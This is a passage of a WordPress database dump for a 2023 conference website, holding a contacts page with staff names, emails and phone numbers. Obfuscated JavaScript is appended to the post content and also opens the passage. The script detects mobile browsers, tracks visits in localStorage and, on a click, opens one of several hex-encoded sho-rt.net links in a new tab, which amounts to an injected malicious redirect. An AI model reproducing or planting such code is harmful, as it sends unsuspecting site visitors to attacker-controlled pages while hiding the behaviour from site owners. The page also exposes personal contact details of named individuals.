_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-28 09:37:04','2023-06-28 09:37:04','',4823,'https://gsw2023.com/?p=4953',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4954,4,'2023-06-28 09:37:14','2023-06-28 09:37:14','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944998185{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tell:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 